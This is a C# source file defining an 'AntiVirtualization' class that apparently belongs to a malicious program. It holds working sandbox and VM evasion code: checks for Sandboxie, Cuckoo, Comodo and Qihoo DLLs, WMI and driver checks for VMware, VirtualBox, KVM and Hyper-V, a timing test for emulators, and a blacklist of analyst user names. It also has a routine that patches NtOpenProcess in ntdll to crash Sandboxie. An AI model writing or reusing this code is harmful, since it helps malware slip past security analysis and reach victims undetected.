using System;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Runtime.InteropServices;
using System.ServiceProcess;
using System.Threading;

namespace EtherealEngine.Services;

public class AntiVirtualization
{
	[DllImport("kernel32.dll", SetLastError = true)]
	private static extern IntPtr GetModuleHandle(string lib);

	[DllImport("kernel32.dll", SetLastError = true)]
	private static extern IntPtr GetProcAddress(IntPtr ModuleHandle, string Function);

	[DllImport("kernel32.dll", SetLastError = true)]
	private static extern bool WriteProcessMemory(IntPtr ProcHandle, IntPtr BaseAddress, byte[] Buffer, uint size, int NumOfBytes);

	[DllImport("kernel32.dll", SetLastError = true)]
	private static extern bool IsProcessCritical(IntPtr Handle, ref bool BoolToCheck);

	public static string IsSandboxiePresent()
	{
		if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
		{
			return "[Bad]";
		}
		return "[Good]";
	}

	public static string IsComodoSandboxPresent()
	{
		if (GetModuleHandle("cmdvrt32.dll").ToInt32() != 0 || GetModuleHandle("cmdvrt64.dll").ToInt32() != 0)
		{
			return "[Bad]";
		}
		return "[Good]";
	}

	public static string IsQihoo360SandboxPresent()
	{
		if (GetModuleHandle("SxIn.dll").ToInt32() != 0)
		{
			return "[Bad]";
		}
		return "[Good]";
	}

	public static string IsCuckooSandboxPresent()
	{
		if (GetModuleHandle("cuckoomon.dll").ToInt32() != 0)
		{
			return "[Bad]";
		}
		return "[Good]";
	}

	public static string IsEmulationPresent()
	{
		long num = Environment.TickCount;
		Thread.Sleep(500);
		if (Environment.TickCount - num < 500)
		{
			return "[Bad]";
		}
		return "[Good]";
	}

	public static string IsWinePresent()
	{
		if (GetProcAddress(GetModuleHandle("kernel32.dll"), "wine_get_unix_file_name").ToInt32() != 0)
		{
			return "[Bad]";
		}
		return "[Good]";
	}

	public static string CheckForVMwareAndVirtualBox()
	{
		using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
		{
			using ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get();
			foreach (ManagementBaseObject item in managementObjectCollection)
			{
				string text = item["Manufacturer"].ToString()!.ToLower();
				string text2 = item["Model"].ToString();
				if ((text == "microsoft corporation" && text2.ToUpperInvariant().Contains("VIRTUAL")) || text.Contains("vmware"))
				{
					return "[Bad]";
				}
			}
		}
		return "[Good]";
	}

	public static string CheckForKVM()
	{
		string[] array = new string[5] { "balloon.sys", "netkvm.sys", "vioinput", "viofs.sys", "vioser.sys" };
		string[] files = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Windows) + "\\System32", "*");
		foreach (string text in files)
		{
			string[] array2 = array;
			foreach (string value in array2)
			{
				if (text.Contains(value))
				{
					return "[Bad]";
				}
			}
		}
		return "[Good]";
	}

	public static string CheckForHyperV()
	{
		ServiceController[] services = ServiceController.GetServices();
		foreach (ServiceController serviceController in services)
		{
			string[] array = new string[3] { "vmbus", "VMBusHID", "hyperkbd" };
			foreach (string value in array)
			{
				if (serviceController.ServiceName.Contains(value))
				{
					return "[Bad]";
				}
			}
		}
		return "[Good]";
	}

	public static string CheckForBlacklistedNames()
	{
		string[] array = new string[10] { "Johnson", "Miller", "malware", "maltest", "CurrentUser", "Sandbox", "virus", "John Doe", "test user", "sand box" };
		foreach (string text in array)
		{
			if (Environment.UserName == text)
			{
				return "[Bad]";
			}
		}
		return "[Good]";
	}

	public static void CrashingSandboxie()
	{
		byte[] buffer = new byte[5] { 184, 38, 0, 0, 0 };
		IntPtr procAddress = GetProcAddress(GetModuleHandle("ntdll.dll"), "NtOpenProcess");
		WriteProcessMemory(Process.GetCurrentProcess().Handle, procAddress, buffer, 5u, 0);
		Process[] processes = Process.GetProcesses();
		foreach (Process process in processes)
		{
			bool BoolToCheck = false;
			try
			{
				IsProcessCritical(process.Handle, ref BoolToCheck);
			}
			catch
			{
			}
		}
	}
}
